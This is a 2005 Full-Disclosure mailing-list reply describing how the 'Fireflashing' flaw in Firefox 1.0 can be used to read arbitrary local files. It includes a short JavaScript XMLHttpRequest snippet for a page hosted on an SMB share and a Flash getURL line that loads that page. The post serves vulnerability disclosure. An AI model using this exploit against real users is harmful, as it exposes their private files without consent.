Re: [Full-Disclosure] Fireflashing [Firefox 1.0]
From: Jelmer Kuperus (jkuperus_at_planet.nl)
Date: 02/12/05
- Previous message: Bernhard Kuemel: "[Full-Disclosure] mailman email harvester"
- In reply to: mikx: "[Full-Disclosure] Fireflashing [Firefox 1.0]"
- Next in thread: Jelmer Kuperus: "Re: [Full-Disclosure] Fireflashing [Firefox 1.0]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 12 Feb 2005 15:25:30 +0100 To: mikx <mikx@mikx.de>
I took a quick 5 minute look at this, and it looks like you can read
arbitrary files with this without requiring any kind of user interaction.
Just create a file called whatever.html on a windows SMB share with this
content
--snip--
<script language="javascript">
var oXML=new XMLHttpRequest();
oXML.open("GET","file:///C:/jelmer.txt",false);
oXML.send(null);
alert(oXML.responseText);
</script>
--snip--
Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
(I just created an empty flash file with a single action that contained
the following line of actionscript : getURL
("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
and presto it will display the contents of c:\jelmer.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Bernhard Kuemel: "[Full-Disclosure] mailman email harvester"
- In reply to: mikx: "[Full-Disclosure] Fireflashing [Firefox 1.0]"
- Next in thread: Jelmer Kuperus: "Re: [Full-Disclosure] Fireflashing [Firefox 1.0]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
